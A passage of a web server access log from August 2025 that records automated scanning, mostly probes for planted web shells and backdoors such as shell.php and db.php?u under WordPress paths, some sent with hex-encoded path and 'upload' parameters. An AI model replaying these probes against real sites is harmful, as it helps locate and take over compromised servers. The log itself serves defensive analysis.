Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.73.216.186 - - [12/Aug/2025:12:37:59 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 94.16.113.252 - - [12/Aug/2025:12:38:09 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:39:16 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:39:54 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:40:46 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:40:57 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:12:41:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:12:41:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:12:41:59 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:12:41:59 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:42:12 -0400] "GET /simple.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:42:15 -0400] "GET /classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:42:21 -0400] "GET /install.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:42:40 -0400] "GET /admin.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:42:53 -0400] "GET /chosen.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 146.190.11.185 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:43:34 -0400] "GET /wp-includes/js/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 164.90.241.135 - - [12/Aug/2025:12:43:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:12:43:35 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:43:40 -0400] "GET /wp-includes/sodium_compat/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:43:52 -0400] "GET /wp-includes/fonts/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:44:00 -0400] "GET /wp-includes/Text/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:44:06 -0400] "GET /wp-admin/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:44:48 -0400] "GET /wp-content/uploads/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 347 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:00 -0400] "GET /wp-includes/images/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 347 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:06 -0400] "GET /demo.oksypay.com/cgi-bin/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 86.8.204.43 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:12:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:45:23 -0400] "GET /wp-includes/SimplePie/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:27 -0400] "GET /wp-includes/widgets/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 348 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:34 -0400] "GET /assets/mbr-switch-arrow/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:35 -0400] "GET /wp-includes/random_compat/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:38 -0400] "GET /v1/pdf/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:42 -0400] "GET /tpcx/images/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:45:44 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:46:18 -0400] "GET /wp-includes/pomo/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:47:17 -0400] "GET /wp-content/uploads/complianz/snapshots/shell.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:47:22 -0400] "GET /wp-admin/css/classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:47:34 -0400] "GET /wp-admin/classwithtostring.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:47:45 -0400] "GET /wp-includes/images/crystal/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:47:58 -0400] "GET /wp-includes/blocks/media-text/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:48:05 -0400] "GET /wp-includes/Requests/index.php?p=2f686f6d652f7074317464616379696b39722f7075626c69635f68746d6c&tod=75706c6f6164 HTTP/1.1" 301 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 152.42.157.60 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:12:48:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:48:31 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 31.13.115.3 - - [12/Aug/2025:12:50:18 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:12:50:45 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:52:02 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:53:25 -0400] "GET /admin.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:53:32 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:56:30 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:12:57:24 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:12:58:06 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:59:22 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:13:00:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:01:13 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:13:01:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:13:01:21 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:13:01:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:13:01:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:13:05:06 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:08:54 -0400] "GET /link.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:09:39 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:10:20 -0400] "GET /admin.php?520 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:10:31 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:13:10:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:11:05 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:11:35 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:11:37 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:13:13:07 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:13:15 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:13:56 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:14:24 -0400] "GET /about.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - 